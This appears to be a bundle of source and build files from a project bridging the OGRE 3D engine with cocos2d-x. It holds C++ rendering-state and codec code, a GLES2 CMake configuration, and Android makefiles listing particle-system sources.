for (int i = 0; i < supports_num; i++)
{
codec = OGRE_NEW BridgeImageCodec(supports[i], supports_type[i]);
s_sCodecList.push_back(codec);
Codec::registerCodec(codec);
}
}
/// Static method to shutdown FreeImage and unregister the FreeImage codecs
void BridgeImageCodec::shutdown(void)
{
std::vector<ImageCodec*>::iterator itor, end;
end = s_sCodecList.end();
itor = s_sCodecList.begin();
for (; itor != end; itor++)
{
Codec::unRegisterCodec(*itor);
OGRE_DELETE *itor;
}
s_sCodecList.clear();
}
};
<file_sep>#include "OgreNodeProtocol.h"
#include <Ogre.h>
#include "components\OgreBridgeBufferManager.h"
#include "components\OgreBridgeTextureManager.h"
#include "OgreOgreManager.h"
USING_NS_CC;
namespace Ogre
{
RenderState::RenderState()
{
_visible = false;
glProgramState = NULL;
mat4 = cocos2d::Mat4::IDENTITY;
}
RenderState::RenderState(RenderState& state)
{
_visible = state._visible;
isTransparent = state.isTransparent;
isDepthTestEnabled = state.isDepthTestEnabled;
isDepthWriteEnabled = state.isDepthWriteEnabled;
textureId = state.textureId;
vertexBufferId = state.vertexBufferId;
indexBufferId = state.indexBufferId;
indexBufferType = state.indexBufferType;
indexCount = state.indexCount;
operationType = state.operationType;
mat4 = state.mat4;
blend = state.blend;
meshCommand = state.meshCommand;
glProgramState = state.glProgramState;
}
RenderState::RenderState(const RenderState& state)
{
_visible = state._visible;
isTransparent = state.isTransparent;
isDepthTestEnabled = state.isDepthTestEnabled;
isDepthWriteEnabled = state.isDepthWriteEnabled;
textureId = state.textureId;
vertexBufferId = state.vertexBufferId;
indexBufferId = state.indexBufferId;
indexBufferType = state.indexBufferType;
indexCount = state.indexCount;
operationType = state.operationType;
mat4 = state.mat4;
blend = state.blend;
meshCommand = state.meshCommand;
glProgramState = state.glProgramState;
}
/*class QueueVisitor : public RenderQueue
{
public:
virtual ~QueueVisitor(){};
QueueVisitor():mCurProtocol(NULL){}
void _visitor(Ogre::SceneNode *node)
{
SceneNode::ObjectIterator objs = node->getAttachedObjectIterator();
while (objs.hasMoreElements())
{
MovableObject* mobj = objs.getNext();
mobj->_updateRenderQueue(this);
}
SceneNode::ChildNodeIterator children = node->getChildIterator();
while (children.hasMoreElements())
{
this->_visitor(static_cast<SceneNode*>(children.getNext()));
}
}
void visitor(cocos2d::NodeProtocol *protocol)
{
mCurProtocol = protocol;
protocol->_update(true,true);
_visitor(protocol);
protocol->_update(true,true);
mCurProtocol = NULL;
}
virtual void addRenderable(Renderable* pRend, uint8 groupID, ushort priority)
{
Technique* pTech;
// tell material it's been used
if (!pRend->getMaterial().isNull())
pRend->getMaterial()->touch();
// Check material & technique supplied (the former since the default implementation
// of getTechnique is based on it for backwards compatibility
if(pRend->getMaterial().isNull() || !pRend->getTechnique())
{
// Use default base white
MaterialPtr baseWhite = MaterialManager::getSingleton().getByName("BaseWhite");
pTech = baseWhite->getTechnique(0);
}
else
pTech = pRend->getTechnique();
if (mRenderableListener)
{
// Allow listener to override technique and to abort
if (!mRenderableListener->renderableQueued(pRend, groupID, priority,
&pTech, this))
return; // rejected
// tell material it's been used (incase changed)
pTech->getParent()->touch();
}
bool isTransparent = false;
if (pTech->isTransparentSortingForced() ||
(pTech->isTransparent() &&
(!pTech->isDepthWriteEnabled() ||
!pTech->isDepthCheckEnabled() ||
pTech->hasColourWriteDisabled())))
{
if (pTech->isTransparentSortingEnabled())
isTransparent = true;
}
else
{
//Technique::PassIterator pi = pTech->getPassIterator();
//
//while (pi.hasMoreElements())
//{
// _render(pRend, pi.getNext(),false);
//}
}
Technique::PassIterator pi = pTech->getPassIterator();
while (pi.hasMoreElements())
{
_render(pRend, pi.getNext(),isTransparent);
}
}
void _render(Renderable *rend,const Pass *pass,bool isTransport)
{
MeshStateMap &stateMap = mCurProtocol->getRenderStates();
MeshStateMap::iterator stateItor = stateMap.find(rend);
RenderState *renderState;
Ogre::RenderOperation ro;
rend->preRender(OgreManager::getInstance()->getSceneManager(), OgreManager::getInstance()->getRenderSystem());
rend->getRenderOperation(ro);
if(stateItor != stateMap.end())
{
renderState = &stateItor->second;
_refreshVectexBufferId(ro,renderState->vertexBufferId);
}
else
{
stateMap[rend] = RenderState();
stateItor = stateMap.find(rend);
renderState = &stateItor->second;
//create and set our custom shader
auto shader =GLProgram::createWithFilenames("cylinder.vert","cylinder.frag");
renderState->glProgramState = GLProgramState::create(shader);
CC_SAFE_RETAIN(renderState->glProgramState);
// cylinder->setGLProgramState(_state);
//auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram();
//renderState->glProgramState = cocos2d::GLProgramState::getOrCreateWithGLProgramName(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
_refreshProgramState(ro,renderState->glProgramState,renderState->vertexBufferId);
}
renderState->blend.src = pass->getSourceBlendFactor();
renderState->blend.dst = pass->getDestBlendFactor();
int tempCount = rend->getNumWorldTransforms();
if(tempCount > 0)
{
rend->getWorldTransforms(mTempXform);
renderState->mat4 = *((cocos2d::Mat4*)mTempXform);
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
pTex->_prepare();
//if (pTex->hasViewRelativeTextureCoordinateGeneration())
//{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
//}
//++unit;
BridgeTexturePtr textP = BridgeTexturePtr(pTex->_getTexturePtr());
if(!textP.isNull())
{
renderState->textureId = textP->getGLID();
}
}
if (ro.useIndexes)
{
renderState->_visible = true;
renderState->indexBufferId = static_cast<BridgeHardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
renderState->indexBufferType = ro.indexData->indexBuffer->getType();
renderState->operationType = ro.operationType;
renderState->indexCount = ro.indexData->indexCount;
renderState->isTransparent = isTransport;
renderState->isDepthTestEnabled = pass->getDepthCheckEnabled();
renderState->isDepthWriteEnabled = pass->getDepthWriteEnabled();
}
}
void _refreshVectexBufferId(RenderOperation &ro,GLuint &bufferId)
{
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem,elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
}
}
void _refreshProgramState(RenderOperation &ro,cocos2d::GLProgramState *state,GLuint &bufferId)
{
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
GLenum type = 0;
GLsizei size = 0;
GLboolean normalised = GL_FALSE;
const char* attribute_name = NULL;
switch(elem->getType())
{
case VET_FLOAT1:
type = GL_FLOAT;
size = 1;
normalised = GL_FALSE;
break;
case VET_FLOAT2:
type = GL_FLOAT;
size = 2;
normalised = GL_FALSE;
break;
case VET_FLOAT3:
type = GL_FLOAT;
size = 3;
normalised = GL_FALSE;
break;
case VET_FLOAT4:
type = GL_FLOAT;
size = 4;
normalised = GL_FALSE;
break;
case VET_SHORT1:
type = GL_SHORT;
size = 1;
normalised = GL_FALSE;
break;
case VET_SHORT2:
type = GL_SHORT;
size = 2;
normalised = GL_FALSE;
break;
case VET_SHORT3:
type = GL_SHORT;
size = 3;
normalised = GL_FALSE;
break;
case VET_SHORT4:
type = GL_SHORT;
size = 4;
normalised = GL_FALSE;
break;
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
case VET_UBYTE4:
size = 4;
normalised = GL_TRUE;
type = GL_UNSIGNED_BYTE;
break;
default:
break;
};
switch(elem->getSemantic())
{
case VES_POSITION:
attribute_name = "a_position";GLProgram::ATTRIBUTE_NAME_POSITION;
break;
case VES_BLEND_WEIGHTS:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_WEIGHT;
break;
case VES_BLEND_INDICES:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_INDEX;
break;
case VES_NORMAL:
attribute_name = "a_color"; GLProgram::ATTRIBUTE_NAME_NORMAL;
break;
case VES_DIFFUSE:
attribute_name = GLProgram::ATTRIBUTE_NAME_COLOR;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attribute_name = "a_texCoord";GLProgram::ATTRIBUTE_NAME_TEX_COORD;
break;
//case VES_BINORMAL:
// break;
//case VES_TANGENT:
// break;
}
//int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei stride = static_cast<GLsizei>(vertexBuffer->getVertexSize());
state->setVertexAttribPointer(attribute_name,
size,
type,
normalised,
stride,
(GLvoid*)pBufferData
);
}
}
protected:
Ogre::Matrix4 mTempXform[256];
bool mVisibleFlag;
MeshStateMap mMeshStates;
cocos2d::NodeProtocol *mCurProtocol;
};*/
}
/*
static Ogre::QueueVisitor *s_QueueVisitor = NULL;
NS_CC_BEGIN
NodeProtocol::NodeProtocol(Ogre::SceneManager * creator) :
Ogre::SceneNode(NULL)
{
if(NULL == s_QueueVisitor) //cannot crate this object before root
{
s_QueueVisitor = new Ogre::QueueVisitor();
}
}
NodeProtocol::NodeProtocol(Ogre::SceneManager * creator,const std::string &name) :
Ogre::SceneNode(NULL)
{
if(NULL == s_QueueVisitor) //cannot crate this object before root
{
s_QueueVisitor = new Ogre::QueueVisitor();
}
}
NodeProtocol::~NodeProtocol()
{
}
void NodeProtocol::setCocosMatrix4(const cocos2d::Mat4 &mat)
{
cocos2d::Quaternion rotation;
cocos2d::Vec3 scale, translation;
mat.decompose(&scale, &rotation, &translation);
/*mCocosScale.x = scale.x;
mCocosScale.y = scale.y;
mCocosScale.z = scale.z;
mCocosPosition.x = translation.x;
mCocosPosition.y = translation.y;
mCocosPosition.z = translation.z;
mCocosQuaternion.w = rotation.w;
mCocosQuaternion.x = rotation.x;
mCocosQuaternion.y = rotation.y;
mCocosQuaternion.z = rotation.z;*/
/*mDerivedScale.x = scale.x;
mDerivedScale.y = scale.y;
mDerivedScale.z = scale.z;
mDerivedPosition.x = translation.x;
mDerivedPosition.y = translation.y;
mDerivedPosition.z = translation.z;
mDerivedOrientation.w = rotation.w;
mDerivedOrientation.x = rotation.x;
mDerivedOrientation.y = rotation.y;
mDerivedOrientation.z = rotation.z;
//needUpdate();
}
MeshStateMap &NodeProtocol::getRenderStates()
{
return mRenderStateMap;
}
void NodeProtocol::updateRenderQueue()
{
s_QueueVisitor->visitor(this);
}
const Ogre::Vector3 & NodeProtocol::_getDerivedScale(void) const
{
return mCocosScale;
}
const Ogre::Vector3 & NodeProtocol::_getDerivedPosition(void) const
{
return mCocosPosition;
}
const Ogre::Quaternion & NodeProtocol::_getDerivedOrientation(void) const
{
return mCocosQuaternion;
}
Ogre::Node* NodeProtocol::createChildImpl(void)
{
return new NodeProtocol(NULL);
}
Ogre::Node* NodeProtocol::createChildImpl(const Ogre::String& name)
{
return createChildImpl();
}
NS_CC_END*/<file_sep>#-------------------------------------------------------------------
# This file is part of the CMake build system for OGRE
# (Object-oriented Graphics Rendering Engine)
# For the latest info, see http://www.ogre3d.org/
#
# The contents of this file are placed in the public domain. Feel
# free to make use of it in any way you like.
#-------------------------------------------------------------------
# Configure OpenGL ES 2.0 RenderSystem build
set(HEADER_FILES
include/OgreGLES2Context.h
include/OgreGLES2DefaultHardwareBufferManager.h
include/OgreGLES2DepthBuffer.h
include/OgreGLES2FBOMultiRenderTarget.h
include/OgreGLES2FBORenderTexture.h
include/OgreGLES2FrameBufferObject.h
include/OgreGLES2GpuProgram.h
include/OgreGLES2GpuProgramManager.h
include/OgreGLES2HardwareBufferManager.h
include/OgreGLES2HardwareIndexBuffer.h
include/OgreGLES2HardwareOcclusionQuery.h
include/OgreGLES2HardwarePixelBuffer.h
include/OgreGLES2HardwareVertexBuffer.h
include/OgreGLES2PixelFormat.h
include/OgreGLES2Plugin.h
include/OgreGLES2Prerequisites.h
include/OgreGLES2RenderSystem.h
include/OgreGLES2RenderTexture.h
include/OgreGLES2Support.h
include/OgreGLES2Texture.h
include/OgreGLES2TextureManager.h
)
set(SOURCE_FILES
src/OgreGLES2Context.cpp
src/OgreGLES2DefaultHardwareBufferManager.cpp
src/OgreGLES2DepthBuffer.cpp
src/OgreGLES2EngineDll.cpp
src/OgreGLES2FBOMultiRenderTarget.cpp
src/OgreGLES2FBORenderTexture.cpp
src/OgreGLES2FrameBufferObject.cpp
src/OgreGLES2GpuProgram.cpp
src/OgreGLES2GpuProgramManager.cpp
src/OgreGLES2HardwareBufferManager.cpp
src/OgreGLES2HardwareIndexBuffer.cpp
src/OgreGLES2HardwareOcclusionQuery.cpp
src/OgreGLES2HardwarePixelBuffer.cpp
src/OgreGLES2HardwareVertexBuffer.cpp
src/OgreGLES2PixelFormat.cpp
src/OgreGLES2Plugin.cpp
src/OgreGLES2RenderSystem.cpp
src/OgreGLES2RenderTexture.cpp
src/OgreGLES2Support.cpp
src/OgreGLES2Texture.cpp
src/OgreGLES2TextureManager.cpp
)
set(GLSLES_FILES
src/GLSLES/include/OgreGLSLESExtSupport.h
src/GLSLES/include/OgreGLSLESGpuProgram.h
src/GLSLES/include/OgreGLSLESLinkProgram.h
src/GLSLES/include/OgreGLSLESLinkProgramManager.h
src/GLSLES/include/OgreGLSLESPreprocessor.h
src/GLSLES/include/OgreGLSLESProgram.h
src/GLSLES/include/OgreGLSLESProgramCommon.h
src/GLSLES/include/OgreGLSLESProgramFactory.h
src/GLSLES/include/OgreGLSLESProgramManagerCommon.h
src/GLSLES/include/OgreGLSLESProgramPipeline.h
src/GLSLES/include/OgreGLSLESProgramPipelineManager.h
src/GLSLES/src/OgreGLSLESExtSupport.cpp
src/GLSLES/src/OgreGLSLESGpuProgram.cpp
src/GLSLES/src/OgreGLSLESLinkProgram.cpp
src/GLSLES/src/OgreGLSLESLinkProgramManager.cpp
src/GLSLES/src/OgreGLSLESPreprocessor.cpp
src/GLSLES/src/OgreGLSLESProgram.cpp
src/GLSLES/src/OgreGLSLESProgramCommon.cpp
src/GLSLES/src/OgreGLSLESProgramFactory.cpp
src/GLSLES/src/OgreGLSLESProgramManagerCommon.cpp
src/GLSLES/src/OgreGLSLESProgramPipeline.cpp
src/GLSLES/src/OgreGLSLESProgramPipelineManager.cpp
)
if (OGRE_CONFIG_ENABLE_GLES2_CG_SUPPORT)
set(GLSLES_FILES
src/GLSLES/src/OgreGLSLESCgProgram.cpp
src/GLSLES/src/OgreGLSLESCgProgramFactory.cpp
${GLSLES_FILES}
)
endif (OGRE_CONFIG_ENABLE_GLES2_CG_SUPPORT)
set(PLATFORM_HEADERS
include/common/OgreCommonWindow.h
include/common/OgreCommonGLSupport.h
include/common/OgreCommonGLContext.h
)
set(PLATFORM_SOURCES
src/common/OgreCommonWindow.cpp
src/common/OgreCommonGLSupport.cpp
src/common/OgreCommonGLContext.cpp
)
include_directories("../include")
include_directories("../ogre_main/include")
include_directories("include")
include_directories("include/common")
include_directories("src/GLSLES/include")
include_directories("../../../cocos")
# Add platform specific files
if (OGRE_BUILD_PLATFORM_NACL)
set(PLATFORM_LIBS nosys)
set(PLATFORM_HEADER_INSTALL "NaCl")
elseif (WIN32)
include_directories("../../../cocos/platform/win32")
include_directories("../../../external/freetype2/include/win32")
include_directories("../../../external/win32-specific/gles/include/OGLES")
set(PLATFORM_HEADER_INSTALL "WIN32")
elseif (APPLE)
if (OGRE_BUILD_PLATFORM_APPLE_IOS)
include_directories("include/iOS")
include_directories("../../../cocos/platform/ios")
include_directories("../../../external/freetype2/include/ios")
set(PLATFORM_LIBS "")
set(PLATFORM_HEADER_INSTALL "iOS")
else ()
include_directories("include/OSX")
include_directories("../../../cocos/platform/mac")
include_directories("../../../external/freetype2/include/mac")
set(PLATFORM_LIBS "")
set(PLATFORM_HEADER_INSTALL "OSX")
endif ()
elseif (UNIX)
include_directories("../../../cocos/platform/linux")
include_directories("../../../external/freetype2/include/linux")
set(PLATFORM_LIBS "")
set(PLATFORM_HEADER_INSTALL "GLX")
endif()
add_library(ogre_rendersystem STATIC
${SOURCE_FILES}
${GLSLES_FILES}
${PLATFORM_SOURCES}
)
set_target_properties(ogre_rendersystem
PROPERTIES
ARCHIVE_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
LIBRARY_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
)
<file_sep>
#ifndef __BERYL_ScheduleAction_H__
#define __BERYL_ScheduleAction_H__
#include "3d/CCAnimation3D.h"
#include "base/ccMacros.h"
#include "base/CCRef.h"
#include "2d/CCActionInterval.h"
NS_CC_BEGIN
class ScriptCallFuncHelper;
/**
* Inherit from Sprite, achieve BillBoard.
*/
class ScheduleAction : public ActionInterval
{
public:
/** creates the action */
static ScheduleAction* create(float d,ScriptCallFuncHelper *helper);
bool initWithAction(float d,ScriptCallFuncHelper *helper);
//
// Overrides
//
virtual void update(float time) override;
virtual ScheduleAction* reverse() const override;
virtual ScheduleAction* clone() const override;
CC_CONSTRUCTOR_ACCESS:
ScheduleAction();
virtual ~ScheduleAction();
protected:
ScriptCallFuncHelper *mScriptHelper;
private:
CC_DISALLOW_COPY_AND_ASSIGN(ScheduleAction);
};
NS_CC_END
#endif // __BERYL_ScheduleAction_H__
<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreRoot.h"
#include "OgreException.h"
#include "OgreLogManager.h"
#include "OgreStringConverter.h"
#include "OgreWindowEventUtilities.h"
#include "OgreBridgeWindow.h"
namespace Ogre {
BridgeWindow::BridgeWindow()
:mClosed(true)
{
}
BridgeWindow::~BridgeWindow()
{
}
void BridgeWindow::reposition( int left, int top )
{
LogManager::getSingleton().logMessage("\treposition called");
}
void BridgeWindow::resize(uint width, uint height)
{
LogManager::getSingleton().logMessage("\tresize called");
}
void BridgeWindow::windowMovedOrResized()
{
LogManager::getSingleton().logMessage("\twindowMovedOrResized called");
}
bool BridgeWindow::requiresTextureFlipping() const
{
return false;
}
void BridgeWindow::copyContentsToMemory(const PixelBox &dst, FrameBuffer buffer)
{
}
void BridgeWindow::destroy(void)
{
LogManager::getSingleton().logMessage("\tdestroy called");
}
bool BridgeWindow::isClosed(void) const
{
return mClosed;
}
void BridgeWindow::create(const String& name, uint width, uint height,
bool fullScreen, const NameValuePairList *miscParams)
{
LogManager::getSingleton().logMessage("\tcreate called");
mName = name;
mWidth = width;
mHeight = height;
mLeft = 0;
mTop = 0;
mActive = true;
//mVisible = true;
mClosed = false;
}
}<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE := encapsulation_static
LOCAL_MODULE_FILENAME := libencapsulation
# ogre_rendersystem
LOCAL_OGRE_COCOS_INCLUDE := \
$(LOCAL_PATH)/ogre
LOCAL_OGRE_COCOS_SRC_FILES := \
ogre/OgreOgreSprite3D.cpp \
ogre/OgreParticleSprite3D.cpp \
ogre/OgreOgreManager.cpp \
ogre/OgreNodeProtocol.cpp \
ogre/components/OgreBridgeSceneManager.cpp \
ogre/components/OgreBridgeFileSystemArchive.cpp \
ogre/components/OgreBridgeGpuProgram.cpp \
ogre/components/OgreBridgeGpuProgramManager.cpp \
ogre/components/OgreBridgeImageCodec.cpp \
ogre/components/OgreBridgeRenderSystem.cpp \
ogre/components/OgreBridgeBufferManager.cpp \
ogre/components/OgreBridgeTextureManager.cpp \
ogre/components/OgreBridgeRenderSystemPlugin.cpp \
ogre/components/OgreBridgeSceneManager.cpp \
ogre/components/OgreBridgeWindow.cpp \
extension/GroupNode3D.cpp \
extension/CameraBillBoard.cpp \
extension/BonesAnimate3D.cpp \
extension/ScheduleAction.cpp \
extension/ScriptCallFuncHelper.cpp \
LOCAL_EXPORT_C_INCLUDES :=
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/ogre
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/extension
LOCAL_C_INCLUDES :=
LOCAL_C_INCLUDES += $(LOCAL_OGRE_COCOS_INCLUDE)
LOCAL_SRC_FILES :=
LOCAL_SRC_FILES += $(LOCAL_OGRE_COCOS_SRC_FILES)
LOCAL_WHOLE_STATIC_LIBRARIES := cocos2dx_static
LOCAL_WHOLE_STATIC_LIBRARIES += ogremain_static
LOCAL_WHOLE_STATIC_LIBRARIES += particlefx_static
LOCAL_WHOLE_STATIC_LIBRARIES += universe_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,.)
$(call import-module,../third_party/ogre/ogre_main)
$(call import-module,../third_party/ogre/ogre_particlefx)
$(call import-module,../third_party/ogre/ogre_pu)<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE := universe_static
LOCAL_MODULE_FILENAME := libuniverse
# ogre_pu
LOCAL_OGRE_PARTICLE_UNIVERSE_INCLUDE := \
$(LOCAL_PATH)/include \
$(LOCAL_PATH)/include/Externs \
$(LOCAL_PATH)/include/ParticleAffectors \
$(LOCAL_PATH)/include/ParticleBehaviours \
$(LOCAL_PATH)/include/ParticleEmitters \
$(LOCAL_PATH)/include/ParticleEventHandlers \
$(LOCAL_PATH)/include/ParticleRenderers
LOCAL_OGRE_PARTICLE_UNIVERSE_SRC_FILES := \
src/ParticleUniverseAffector.cpp \
src/ParticleUniverseAffectorTokens.cpp \
src/ParticleUniverseAliasTokens.cpp \
src/ParticleUniverseAtlasImage.cpp \
src/ParticleUniverseAttachable.cpp \
src/ParticleUniverseAttachableTokens.cpp \
src/ParticleUniverseBehaviourTokens.cpp \
src/ParticleUniverseCameraDependency.cpp \
src/ParticleUniverseCameraDependencyTokens.cpp \
src/ParticleUniverseDll.cpp \
src/ParticleUniverseDynamicAttribute.cpp \
src/ParticleUniverseDynamicAttributeTokens.cpp \
src/ParticleUniverseEmitter.cpp \
src/ParticleUniverseEmitterTokens.cpp \
src/ParticleUniverseEventHandlerTokens.cpp \
src/ParticleUniverseExtern.cpp \
src/ParticleUniverseExternTokens.cpp \
src/ParticleUniverseForceField.cpp \
src/ParticleUniverseNoise.cpp \
src/ParticleUniverseObserver.cpp \
src/ParticleUniverseObserverTokens.cpp \
src/ParticleUniverseParticle.cpp \
src/ParticleUniverseParticlePool.cpp \
src/ParticleUniversePCH.cpp \
src/ParticleUniversePlugin.cpp \
src/ParticleUniverseRenderer.cpp \
src/ParticleUniverseRendererTokens.cpp \
src/ParticleUniverseScriptDeserializer.cpp \
src/ParticleUniverseScriptSerializer.cpp \
src/ParticleUniverseSystem.cpp \
src/ParticleUniverseSystemManager.cpp \
src/ParticleUniverseSystemManagerTokens.cpp \
src/ParticleUniverseSystemTokens.cpp \
src/ParticleUniverseTechnique.cpp \
src/ParticleUniverseTechniqueTokens.cpp \
src/ParticleUniverseVisualParticle.cpp \
src/ParticleEmitters/ParticleUniverseBoxEmitter.cpp \
src/ParticleEmitters/ParticleUniverseBoxEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseCircleEmitter.cpp \
src/ParticleEmitters/ParticleUniverseCircleEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseLineEmitter.cpp \
src/ParticleEmitters/ParticleUniverseLineEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitter.cpp \
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniversePointEmitter.cpp \
src/ParticleEmitters/ParticleUniversePointEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniversePositionEmitter.cpp \
src/ParticleEmitters/ParticleUniversePositionEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseSlaveEmitter.cpp \
src/ParticleEmitters/ParticleUniverseSlaveEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitter.cpp \
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitterTokens.cpp \
src/ParticleEmitters/ParticleUniverseVertexEmitter.cpp \
src/ParticleEmitters/ParticleUniverseVertexEmitterTokens.cpp \
src/ParticleRenderers/ParticleUniverseBeamRenderer.cpp \
src/ParticleRenderers/ParticleUniverseBeamRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseBillboardRenderer.cpp \
src/ParticleRenderers/ParticleUniverseBillboardRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseBox.cpp \
src/ParticleRenderers/ParticleUniverseBoxRenderer.cpp \
src/ParticleRenderers/ParticleUniverseBoxRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseBoxSet.cpp \
src/ParticleRenderers/ParticleUniverseEntityRenderer.cpp \
src/ParticleRenderers/ParticleUniverseEntityRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseLightRenderer.cpp \
src/ParticleRenderers/ParticleUniverseLightRendererTokens.cpp \
src/ParticleRenderers/ParticleUniversePrimitiveShapeSet.cpp \
src/ParticleRenderers/ParticleUniverseRibbonTrailRenderer.cpp \
src/ParticleRenderers/ParticleUniverseRibbonTrailRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseSphere.cpp \
src/ParticleRenderers/ParticleUniverseSphereRenderer.cpp \
src/ParticleRenderers/ParticleUniverseSphereRendererTokens.cpp \
src/ParticleRenderers/ParticleUniverseSphereSet.cpp \
src/ParticleAffectors/ParticleUniverseAlignAffector.cpp \
src/ParticleAffectors/ParticleUniverseAlignAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseBaseCollider.cpp \
src/ParticleAffectors/ParticleUniverseBaseColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseBaseForceAffector.cpp \
src/ParticleAffectors/ParticleUniverseBaseForceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseBoxCollider.cpp \
src/ParticleAffectors/ParticleUniverseBoxColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffector.cpp \
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseColourAffector.cpp \
src/ParticleAffectors/ParticleUniverseColourAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseFlockCenteringAffector.cpp \
src/ParticleAffectors/ParticleUniverseFlockCenteringAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseForceFieldAffector.cpp \
src/ParticleAffectors/ParticleUniverseForceFieldAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseGeometryRotator.cpp \
src/ParticleAffectors/ParticleUniverseGeometryRotatorTokens.cpp \
src/ParticleAffectors/ParticleUniverseGravityAffector.cpp \
src/ParticleAffectors/ParticleUniverseGravityAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseInterParticleCollider.cpp \
src/ParticleAffectors/ParticleUniverseInterParticleColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseJetAffector.cpp \
src/ParticleAffectors/ParticleUniverseJetAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseLineAffector.cpp \
src/ParticleAffectors/ParticleUniverseLineAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseLinearForceAffector.cpp \
src/ParticleAffectors/ParticleUniverseLinearForceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseParticleFollower.cpp \
src/ParticleAffectors/ParticleUniverseParticleFollowerTokens.cpp \
src/ParticleAffectors/ParticleUniversePathFollower.cpp \
src/ParticleAffectors/ParticleUniversePathFollowerTokens.cpp \
src/ParticleAffectors/ParticleUniversePlaneCollider.cpp \
src/ParticleAffectors/ParticleUniversePlaneColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseRandomiser.cpp \
src/ParticleAffectors/ParticleUniverseRandomiserTokens.cpp \
